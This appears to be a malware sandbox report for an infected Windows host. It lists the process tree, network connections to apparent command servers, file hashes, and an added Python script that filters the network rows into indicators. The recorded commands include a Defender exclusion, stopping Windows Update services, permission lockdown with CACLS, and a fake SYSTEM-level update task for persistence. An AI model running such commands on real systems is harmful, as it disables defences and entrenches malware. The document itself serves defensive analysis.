"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\A9D7.exe

C:\Users\Admin\AppData\Local\Temp\A9D7.exe

C:\Users\Admin\AppData\Local\Temp\C33C.exe

C:\Users\Admin\AppData\Local\Temp\C33C.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kx4St2pf.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kx4St2pf.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IB0tc6CQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IB0tc6CQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ok8bG1wv.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ok8bG1wv.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FG2wS5ol.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FG2wS5ol.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1OG42Qe5.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1OG42Qe5.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\D86B.bat

"C:\Users\Admin\AppData\Local\Temp\D86B.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5748 -ip 5748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\DBE7.exe

C:\Users\Admin\AppData\Local\Temp\DBE7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5424 -ip 5424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2816 -ip 2816

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DA3E.tmp\DA3F.tmp\DA40.bat C:\Users\Admin\AppData\Local\Temp\D86B.bat"

C:\Users\Admin\AppData\Local\Temp\DE3A.exe

C:\Users\Admin\AppData\Local\Temp\DE3A.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 544

C:\Users\Admin\AppData\Local\Temp\E0BB.exe

C:\Users\Admin\AppData\Local\Temp\E0BB.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4308 -ip 4308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 388

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2hH861vm.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2hH861vm.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1992 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=168 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\B35F.exe

C:\Users\Admin\AppData\Local\Temp\B35F.exe

C:\Users\Admin\AppData\Local\Temp\B5A2.exe

C:\Users\Admin\AppData\Local\Temp\B5A2.exe

C:\Users\Admin\AppData\Local\Temp\B8D0.exe

C:\Users\Admin\AppData\Local\Temp\B8D0.exe

C:\Users\Admin\AppData\Roaming\wvtwddb

C:\Users\Admin\AppData\Roaming\wvtwddb

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4316 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=B5A2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4ae346f8,0x7ffe4ae34708,0x7ffe4ae34718

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1924 /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1948135323368966856,10829992485559563084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=B5A2.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4cde46f8,0x7ffe4cde4708,0x7ffe4cde4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,11745534208124428805,13146771085866959325,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,11745534208124428805,13146771085866959325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2560 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,11745534208124428805,13146771085866959325,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11745534208124428805,13146771085866959325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,11745534208124428805,13146771085866959325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.251.36.45:443 accounts.google.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 45.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
NL 142.251.36.45:443 accounts.google.com udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
NL 142.251.36.45:443 accounts.google.com udp
US 8.8.8.8:53 254.177.238.8.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 234.17.178.52.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 bytecloudasa.website udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
NL 85.209.176.171:80 85.209.176.171 tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 39.212.67.172.in-addr.arpa udp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 learn.microsoft.com udp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 139.2.85.104.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 162.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 js.monitor.azure.com udp
US 13.107.246.67:443 js.monitor.azure.com tcp
US 13.107.246.67:443 js.monitor.azure.com tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
NL 104.85.2.139:443 learn.microsoft.com tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 172.67.75.172:443 api.ip.sb tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 172.75.67.172.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
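Most rows in the table above are not indicators: the in-addr.arpa queries are reverse lookups of addresses already contacted, the Google, Facebook and Microsoft traffic belongs to the Edge sessions opened from the process list (accounts.google.com, www.facebook.com/login and the go.microsoft.com shim redirect), and 224.0.0.251:5353 is local mDNS. As an added example that is not part of the report, the Python below parses a subset of the rows copied from the table and separates reverse lookups and multicast noise from DNS queries, named connections and direct-to-IP connections, then reports what is left after an allowlist. The suffix allowlist is an assumption made here for illustration, not a list from the report, and a domain that fails it is a candidate for review, not a confirmed C2.

```python
import ipaddress
from typing import Dict, List

# Rows copied from the Network table above (a subset of the report's data, not constructed).
SAMPLE_NETWORK = """\
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.251.36.45:443 accounts.google.com tcp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.55:19071 tcp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
N/A 224.0.0.251:5353 udp
"""

# Assumed analyst allowlist for destinations the sandbox browser is expected to reach.
# This is an assumption of this example, not a list taken from the report.
BENIGN_SUFFIXES = ("google.com", "facebook.com", "fbcdn.net", "microsoft.com", "bing.net", "azure.com")


def parse_rows(text: str) -> List[Dict[str, object]]:
    """Parse 'Country Destination [Domain] Proto' rows; the Domain column may be absent."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        else:
            continue  # header or malformed line
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto})
    return rows


def extract_iocs(rows: List[Dict[str, object]]) -> Dict[str, object]:
    """Bucket rows into noise (reverse lookups, multicast), DNS queries, named and raw-IP connections."""
    out: Dict[str, object] = {"reverse_lookups": 0, "multicast": 0, "dns_queries": set(),
                              "direct_ip": set(), "connections": {}}
    for r in rows:
        ip, port, dom = str(r["ip"]), int(r["port"]), str(r["domain"])
        if ipaddress.ip_address(ip).is_multicast:
            out["multicast"] += 1
            continue
        if port == 53 and r["proto"] == "udp":
            if dom.endswith(".in-addr.arpa"):
                out["reverse_lookups"] += 1  # PTR lookup of an address already contacted
            elif dom:
                out["dns_queries"].add(dom)
            continue
        if not dom or dom == ip:
            out["direct_ip"].add(f"{ip}:{port}")  # no hostname at all: raw-IP C2 candidate
        else:
            out["connections"].setdefault(dom, set()).add(f"{ip}:{port}")
    return out


def is_benign(domain: str) -> bool:
    return any(domain == s or domain.endswith("." + s) for s in BENIGN_SUFFIXES)


def suspicious(iocs: Dict[str, object]) -> Dict[str, List[str]]:
    """Everything not explained by the allowlist: unknown domains plus every raw-IP destination."""
    seen = set(iocs["dns_queries"]) | set(iocs["connections"])
    return {"domains": sorted(d for d in seen if not is_benign(d)),
            "direct_ip": sorted(iocs["direct_ip"])}


if __name__ == "__main__":
    iocs = extract_iocs(parse_rows(SAMPLE_NETWORK))
    print("noise: %d reverse lookups, %d multicast" % (iocs["reverse_lookups"], iocs["multicast"]))
    print(suspicious(iocs))
```

On the twelve copied rows this leaves three domains and three raw-IP destinations. The raw-IP entries on 19071 and 37637 are the strongest block candidates: nothing a browser session legitimately does talks to a bare address on ports like those, and they need no allowlist judgement at all. The domain list still needs an analyst, since an allowlist only says what the environment did not expect.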

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe

MD5 1377782f5fbac0d78f45f7d690db24ce
SHA1 398ab45285f557c948b32c23dc050158852ec1f3
SHA256 9b3ae39eb225c49ca428bbff68f2c33a6c891c68d2ad9d58f47cb88c1b3bfee4
SHA512 88ba89b96ddaa267f59aea901684e355a6549ec92dc210a3f7d4a42e32dfad73995da30f4063c0331b16673c5fc65b361b1bf898f2be2b8d86aeba102f4d9f92

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe

MD5 c414d07f769305cbee971ef6f8a5ade5
